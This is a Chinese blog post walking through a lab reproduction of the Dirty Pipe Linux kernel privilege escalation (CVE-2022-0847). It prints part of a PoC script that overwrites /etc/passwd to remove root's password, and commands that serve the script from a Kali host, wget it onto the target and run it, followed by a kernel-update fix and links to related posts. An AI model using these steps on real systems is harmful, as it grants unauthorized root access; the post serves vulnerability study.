Linux脏管道提权

最新推荐文章于 2025-03-20 12:14:58 发布
最新推荐文章于 2025-03-20 12:14:58 发布
阅读量880 收藏
点赞数
分类专栏: 后渗透 漏洞复现 文章标签: 网络 系统安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43381463/article/details/129222124
版权

Linux脏管道提权

漏洞复现-DirtyPipe提权(CVE-2022-0847)

0x00 前言

此漏洞自 5.8 版本起就已存在。非 root 用户通过注入和覆盖只读文件中的数据,从而获得 root 权限。因为非特权进程可以将代码注入 root 进程。

漏洞利用条件:

1、内核影响版本:5.8 <= Linux kernel < 5.16.11/5.15.25/5.10.102

2、被覆写的目标文件必须拥有可读权限。

uname -a查看内核版本

攻击者靶机
操作系统kaliCentOS 7
IP地址192.168.12.135192.168.12.131
内核5.8.7

这里使用普通用户登录靶机,进行提权,前期入侵操作默认完成

0x01 下载poc代码

https://github.com/r1is/CVE-2022-0847/blob/main/Dirty-Pipe.sh

查看文件,原理

gcc exp.c -o exp -std=c99

# 备份密码文件
rm -f /tmp/passwd
cp /etc/passwd /tmp/passwd
if [ -f "/tmp/passwd" ];then
	echo "/etc/passwd已备份到/tmp/passwd"
	passwd_tmp=$(cat /etc/passwd|head)
	./exp /etc/passwd 1 "${passwd_tmp/root:x/oot:}"

	echo -e "\n# 恢复原来的密码\nrm -rf /etc/passwd\nmv /tmp/passwd /etc/passwd"

	# 现在可以无需密码切换到root账号
	su root

将文件存入/tmp目录下,开启web服务

cd /tmp

python -m http.server 8080

0x02 在靶机运行poc代码

# 下载poc到靶机,如果连的上github,就不用自己部署云上
wget http://192.168.12.135:8080/Dirty-Pipe.sh

# 添加权限
chmod a+x Dirty-Pipe.sh

# 运行代码
./Dirty-Pipe.sh

# 查看
id
whoami
# 是root就成功

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2C9S6l61-1677339539554)(Linux-脏管道提权.assets/image-20230225181744462.png)]

0x03 修复建议

更新系统内核为已修复该漏洞的版本。

CVE-2022-0847(管道内核漏洞)
墨痕诉清风的博客
06-22 4372
摘要 CVE-2022-0847它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致升,因为非特进程可以将代码注入根进程。它类似于 Dirty COW (CVE-2016-5195),但更容易被利用。内核影响版本:5.8 ...............
Linux DirtyPipe内核漏洞(CVE-2022-0847)复现与分析
SHELLCODE_8BIT的博客
10-27 2276
CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”
Linux内核漏洞(Dirty-pipe)复现
qq_69775412的博客
07-25 746
CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。
Linxu管道(CVE-2022-0847)
oiadkt的博客
03-03 267
Linxu管道(CVE-2022-0847)的两种方式,基于覆写/etc/passwd 来和覆盖SUID程序来 下载完成后使用 chmod 给与 Dirty-Pipe.sh 可以执行限,随后运行进行
Linux Dirty Pipe(CVE-2022-0847)
最新发布
qq_33522010的博客
03-20 301
linux内核漏洞,该漏洞允许用户在有读取限的情况下写入任意文件。
DirtyPipe(管道)
weixin_45794666的博客
03-08 7154
DirtyPipe CVE-2022-0847 漏洞详情 新管道缓冲区结构的“flags”成员在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化的方式存在缺陷,因此可能包含陈旧的值。非特本地用户可通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Di
CVE-2022-0847【dirtypipez】管道复现
three_1996的博客
03-20 1227
2022年3月7日,安全研究员Max出一个Linux内核漏洞CVE-2022-0847,利用该漏洞,攻击者能够实现低限用户升至root限,且完成主机任意可读文件的读写。该漏洞在原理上与先前出现的“DirtyCow”漏洞类似,且本质上是由于Kernel内核中编写的匿名管道限制不严的问题,所以将其命名为“DirtyPipe”。
linux-suid--管道
weixin_55885866的博客
11-06 361
作用:让普通用户临时拥有该文件的属主的执行限,suid限只能应用在二进制可执行文件(命令)上,而且suid限只能设置在属主位置上。suid限使用s表示,增加限u+s,移除限u-s;使程序在执行过程中收到了suid 以root限运行。网站搜索是否存在可能。(4)反弹shell。
新版Linux内核漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致升,因为非特进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
Dirty Pipe管道漏洞复现(CVE-2022-0847)
小千安全
05-06 1007
攻击者通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据,可将普通限的用户升到特 root这个漏洞作者将其命名为了 Dirty Pipe(管道),一看到这名字讲道理就让人想到了 Dirty Cow(牛),这是因为该漏洞的原理比较类似于 Dirty Cow,但这个漏洞更容易被利用。
大白话图解 Linux 管道(Dirty Pipe) 漏洞(CVE-2022-0847)
omgFuture的博客
03-08 1万+
大白话图解 Linux 管道(Dirty Pipe) 漏洞(CVE-2022-0847) 漏洞披露链接:https://dirtypipe.cm4all.com/ 背景 ​ 今天(2022年3月8日),开源社区爆出了Linux内核新的一级安全漏洞, Dirty Pipe Vulnerability. 漏洞点于Linux内核5.8版本引入,可以’通杀’后续多个版本内核,以及所有使用了相关Linux内核的下游厂商产品。当然,有必要说明的是,这里的通杀不是针对任意系统的远程命令执行,而是面向内
Dirty Pipe linux内核漏洞分析(CVE-2022-0847)
weixin_51804748的博客
04-01 4931
漏洞原理 Pipe机制 本质上来说,管道(pipe)就是一种进程间通信的手段,让两个进程可以通过pipe 发送和接收数据。 Page Cache机制 磁盘的IO读写速度是很慢的,所以一般当我们访问一个磁盘文件的时候,首先会将其内容装载到物理内存中,后续的访问都是直接取内存中的副本来读取数据。因为一个文件的内存副本,后续可能会被很多进程打开使用。(想想是不是,平常我们的微信软件可能打开本地的一个文本,word软件也可能打开同一个文本)。为了保证大家都能快速的访问,Linux设计了这样一个Page Cache
Linux--内核漏洞--web用户(牛)&本地(管道)
金灰的博客
05-11 709
免责声明:本文仅做技术交流与学习...
堪比“牛”!“管道” 漏洞可获得Linux 所有主流发行版本的root
smellycat000的专栏
03-08 758
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成...
Linux升——信息打点&SUID&DirtyPipe利用
m0_61506558的博客
01-17 578
通过webshell上传linux-exploit-suggester2,运行linux-exploit-suggester-2.pl。通过webshell上传linux-exploit-suggester2 linux-exploit-suggester-2.pl。连接-获取可利用漏洞-下载或上传EXP-编译EXP-给限执行-Flag,vulnhub中的牛漏洞,此漏洞几个月前分析过。找到相应的牛漏洞,然后进行漏洞利用,漏洞payload是一个.c文件,进行.c编译。
CVE-2022-0847 Dirty Pipe linux内核漏洞 | POC
dust_hk的博客
03-09 5296
The Dirty Pipe Linux kernelprivilege escalation 摘要 Linux Kernel 5.8及以后版本中允许覆盖重写任意可读文件中的数据,未经授的本地用户可以使用此漏洞写入由只读文件支持的页面缓存中的页面,可以利用此漏洞进行本地升。类似于CVE-2016-5195 “Dirty Cow”。此漏洞影响 5.17-rc6 之前的 Linux 内核版本。 评分 CVSSV3 :7.8 POC已公开 影响范围 影响版本 5.8 <=.
createfile 无限_Microsoft Windows CreateFile API命名管道升漏洞 | 学步园
weixin_39600328的博客
02-23 232
发布时间:2003-07-08更新时间:2003-07-15严重程度:高威胁程度:本地管理员限错误类型:设计错误利用方式:服务器模式BUGTRAQ ID:8128CVE(CAN) ID:CAN-2003-0496受影响系统Microsoft Windows 2000 Advanced Server SP3Microsoft Windows 2000 Advanced Server SP2Micr...
Linux内核漏洞(Dirty-pipe)复现_linux漏洞
wangluoanquan111的博客
08-29 230
CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。
Linux DirtyPipe内核漏洞(CVE-2022-0847)
热门推荐
Sunnet的博客
03-08 1万+
前言 今天3月8号女神节,女领导和女同事接到通知,都前回家过节去了,领导走了,这不就很清闲了嘛,想干啥就干啥。然而,今天又爆出一个漏洞,这不得学一手。 0x01 漏洞描述 CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 牛漏
Linux系统Dirty Cow漏洞详解
资源摘要信息: "dirtycowLinuxexp" Dirty Cow,即牛,是Linux系统中存在的一种本地漏洞,官方编号为CVE-2016-5195。该漏洞存在于Linux内核的内存子系统中,允许低限用户通过一个竞态条件漏洞升...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值